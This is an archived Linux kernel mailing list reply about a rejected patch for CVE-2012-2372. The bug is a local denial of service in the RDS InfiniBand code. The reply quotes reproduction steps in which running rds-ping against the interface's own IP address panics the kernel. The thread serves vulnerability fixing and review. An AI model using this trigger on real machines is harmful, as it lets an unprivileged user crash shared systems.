Re: [PATCH] rds: fix local ping DoS

From: Josh Hunt
Date: Thu Nov 14 2013 - 08:45:51 EST

Next message: Tomasz Figa: "Re: [PATCHv4] dmaengine: Add support for BCM2835"
Previous message: Venkat Venkatsubra: "RE: [PATCH] rds: Error on offset mismatch if not loopback"
In reply to: David Miller: "Re: [PATCH] rds: fix local ping DoS"
Next in thread: Jay Fenlason: "Re: [PATCH] rds: fix local ping DoS"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

On 11/14/2013 01:03 AM, David Miller wrote:

From: Josh Hunt <johunt@xxxxxxxxxx>
Date: Wed, 13 Nov 2013 17:15:43 -0800

The rds_ib_xmit function in net/rds/ib_send.c in the Reliable Datagram Sockets
(RDS) protocol implementation allows local users to cause a denial of service
(BUG_ON and kernel panic) by establishing an RDS connection with the source
IP address equal to the IPoIB interface's own IP address, as demonstrated by
rds-ping.

A local unprivileged user could use this flaw to crash the system.

CVE-2012-2372

Reported-by: Honggang Li <honli@xxxxxxxxxx>
Signed-off-by: Josh Hunt <johunt@xxxxxxxxxx>

I'm sorry I can't apply this. This commit message needs to be much
less terse and explain things more.

First of all, why is the "off % RDS_FRAG_SIZE" important?

And, even more importantly, why is is OK to avoid this assertion just
because we're going over loopback?

Furthermore, why doesn't net/rds/iw_send.c:rds_iw_xmit() have the same
exact problem? It makes the same exact assertion check.

I know this RDS code is a steaming pile of poo, but that doesn't mean
we just randomly adjust assertions to make crashes go away without
sufficient understanding of exactly what's going on.

Thanks.

Sure understandable questions. Unfortunately I don't have the hardware to properly debug and analyze. I was just trying to get this through on the assumption that the previous attempts just failed due to incorrect submission procedures and lack of a reproducible testcase. If nothing else this whole thing brought out the testcase :)

Testcase from Honggang's earlier mail:
<snip>
The test case is very simple:
Steps to Reproduce:
1. yum install -y rds-tools

2. [root@rdma3 ~]# ifconfig ib0 | grep 'inet addr'
inet addr:172.31.0.3 Bcast:172.31.0.255 Mask:255.255.255.0

3. [root@rdma3 ~]# /usr/bin/rds-ping 172.31.0.3 <<<< kernel panic (You
may need to wait for a few seconds before the kernel panic.)

This bug can be reproduced with Mellanox HCAs (mlx4_ib.ko and mthca.ko),
QLogic HCA (ib_qib.ko). I did not test the QLogic HCA running "ib_ipath.ko".
</snip>

Perhaps Venkat or someone else with the hardware mentioned can provide a better explanation and better solution to the crash.

Josh
--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majordomo@xxxxxxxxxxxxxxx
More majordomo info at http://vger.kernel.org/majordomo-info.html
Please read the FAQ at http://www.tux.org/lkml/

Next message: Tomasz Figa: "Re: [PATCHv4] dmaengine: Add support for BCM2835"
Previous message: Venkat Venkatsubra: "RE: [PATCH] rds: Error on offset mismatch if not loopback"
In reply to: David Miller: "Re: [PATCH] rds: fix local ping DoS"
Next in thread: Jay Fenlason: "Re: [PATCH] rds: fix local ping DoS"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]